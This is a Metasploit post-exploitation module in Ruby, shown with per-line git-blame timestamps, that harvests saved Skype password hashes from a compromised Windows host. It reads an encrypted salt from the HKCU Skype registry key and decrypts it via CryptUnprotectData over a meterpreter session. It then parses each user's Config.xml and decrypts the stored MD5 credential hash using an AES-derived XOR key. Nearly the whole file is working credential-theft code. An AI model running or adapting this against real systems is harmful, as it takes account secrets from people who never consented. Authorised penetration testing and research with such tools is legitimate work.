2014-06-23 19:16:50 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Skype Saved Password Hash Extraction',
|
|
|
|
'Description' => %q{ This module finds saved login credentials
|
|
|
|
for the Windows Skype client. The hash is in MD5 format
|
|
|
|
that uses the username, a static string "\nskyper\n" and the
|
|
|
|
password. The resulting MD5 is stored in the Config.xml file
|
|
|
|
for the user after being XOR'd against a key generated by applying
|
|
|
|
2 SHA1 hashes of "salt" data which is stored in ProtectedStorage
|
|
|
|
using the Windows API CryptProtectData against the MD5 },
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
|
|
|
'mubix', # module
|
|
|
|
'hdm' # crypto help
|
|
|
|
],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'References' => [
|
|
|
|
['URL', 'http://www.recon.cx/en/f/vskype-part2.pdf'],
|
|
|
|
['URL', 'http://insecurety.net/?p=427'],
|
|
|
|
['URL', 'https://github.com/skypeopensource/tools']
|
|
|
|
]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
# To generate test hashes in ruby use:
|
|
|
|
=begin
|
|
|
|
|
|
|
|
require 'openssl'
|
|
|
|
|
|
|
|
username = "test"
|
|
|
|
passsword = "test"
|
|
|
|
|
|
|
|
hash = Digest::MD5.new
|
|
|
|
hash.update username
|
|
|
|
hash.update "\nskyper\n"
|
|
|
|
hash.update password
|
|
|
|
|
|
|
|
puts hash.hexdigest
|
|
|
|
|
2014-07-07 17:39:05 +00:00
|
|
|
=end
|
2014-06-23 19:16:50 +00:00
|
|
|
|
|
|
|
def decrypt_reg(data)
|
|
|
|
rg = session.railgun
|
|
|
|
pid = session.sys.process.getpid
|
|
|
|
process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
|
|
|
mem = process.memory.allocate(512)
|
|
|
|
process.memory.write(mem, data)
|
|
|
|
|
|
|
|
if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
|
|
|
|
addr = [mem].pack("V")
|
|
|
|
len = [data.length].pack("V")
|
|
|
|
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
|
|
|
|
len, addr = ret["pDataOut"].unpack("V2")
|
|
|
|
else
|
2014-06-25 04:16:28 +00:00
|
|
|
# Convert using rex, basically doing: [mem & 0xffffffff, mem >> 32].pack("VV")
|
|
|
|
addr = Rex::Text.pack_int64le(mem)
|
|
|
|
len = Rex::Text.pack_int64le(data.length)
|
2014-06-23 19:16:50 +00:00
|
|
|
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
|
2014-06-23 20:52:53 +00:00
|
|
|
pData = ret["pDataOut"].unpack("VVVV")
|
|
|
|
len = pData[0] + (pData[1] << 32)
|
2014-06-23 21:10:31 +00:00
|
|
|
addr = pData[2] + (pData[3] << 32)
|
2014-06-23 19:16:50 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return "" if len == 0
|
|
|
|
return process.memory.read(addr, len)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Get the "Salt" unencrypted from the registry
|
|
|
|
def get_salt
|
|
|
|
print_status "Checking for encrypted salt in the registry"
|
|
|
|
vprint_status "Checking: HKCU\\Software\\Skype\\ProtectedStorage - 0"
|
|
|
|
rdata = registry_getvaldata('HKCU\\Software\\Skype\\ProtectedStorage', '0')
|
|
|
|
print_good("Salt found and decrypted")
|
|
|
|
return decrypt_reg(rdata)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Pull out all the users in the AppData directory that have config files
|
|
|
|
def get_config_users(appdatapath)
|
|
|
|
users = []
|
|
|
|
dirlist = session.fs.dir.entries(appdatapath)
|
|
|
|
dirlist.shift(2)
|
|
|
|
dirlist.each do |dir|
|
2014-07-01 04:58:17 +00:00
|
|
|
if file?(appdatapath + "\\#{dir}" + '\\config.xml') == false
|
2014-06-23 19:16:50 +00:00
|
|
|
vprint_error "Config.xml not found in #{appdatapath}\\#{dir}\\"
|
|
|
|
next
|
|
|
|
end
|
|
|
|
print_good "Found Config.xml in #{appdatapath}\\#{dir}\\"
|
|
|
|
users << dir
|
|
|
|
end
|
|
|
|
return users
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_config_file(config_path)
|
|
|
|
hex = ""
|
|
|
|
configfile = read_file(config_path)
|
|
|
|
configfile.each_line do |line|
|
|
|
|
if line =~ /Credentials/i
|
|
|
|
hex = line.split('>')[1].split('<')[0]
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return hex
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def decrypt_blob(credhex, salt)
|
|
|
|
|
|
|
|
# Convert Config.xml hex to binary format
|
|
|
|
blob = [credhex].pack("H*")
|
|
|
|
|
|
|
|
# Concatinate SHA digests for AES key
|
2014-06-23 19:39:06 +00:00
|
|
|
sha = Digest::SHA1.digest("\x00\x00\x00\x00" + salt) + Digest::SHA1.digest("\x00\x00\x00\x01" + salt)
|
2014-06-23 19:16:50 +00:00
|
|
|
|
|
|
|
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
|
|
|
|
aes.encrypt
|
|
|
|
aes.key = sha[0,32] # Use only 32 bytes of key
|
2014-06-23 19:37:19 +00:00
|
|
|
final = aes.update([0].pack("N*") * 4) # Encrypt 16 \x00 bytes
|
|
|
|
final << aes.final
|
|
|
|
xor_key = final[0,16] # Get only the first 16 bytes of result
|
2014-06-23 19:16:50 +00:00
|
|
|
|
|
|
|
vprint_status("XOR Key: #{xor_key.unpack("H*")[0]}")
|
|
|
|
|
|
|
|
decrypted = []
|
|
|
|
|
|
|
|
# Use AES/SHA crypto for XOR decoding
|
|
|
|
(0...16).each do |i|
|
|
|
|
decrypted << (blob[i].unpack("C*")[0] ^ xor_key[i].unpack("C*")[0])
|
|
|
|
end
|
|
|
|
|
|
|
|
return decrypted.pack("C*").unpack("H*")[0]
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def get_config_creds(salt)
|
|
|
|
users = []
|
|
|
|
appdatapath = expand_path("%AppData%") + "\\Skype"
|
|
|
|
print_status ("Checking for config files in %APPDATA%")
|
|
|
|
users = get_config_users(appdatapath)
|
|
|
|
if users.any?
|
|
|
|
users.each do |user|
|
|
|
|
print_status("Parsing #{appdatapath}\\#{user}\\Config.xml")
|
|
|
|
credhex = parse_config_file("#{appdatapath}\\#{user}\\config.xml")
|
|
|
|
if credhex == ""
|
|
|
|
print_error("No Credentials3 blob found for #{user} in Config.xml skipping")
|
|
|
|
next
|
|
|
|
else
|
|
|
|
hash = decrypt_blob(credhex, salt)
|
|
|
|
print_good "Skype MD5 found: #{user}:#{hash}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error "No users with configs found. Exiting"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
salt = get_salt
|
|
|
|
if salt != nil
|
|
|
|
creds = get_config_creds(salt)
|
|
|
|
else
|
2014-06-23 19:34:07 +00:00
|
|
|
print_error "No salt found. Cannot continue without salt, exiting"
|
2014-06-23 19:16:50 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|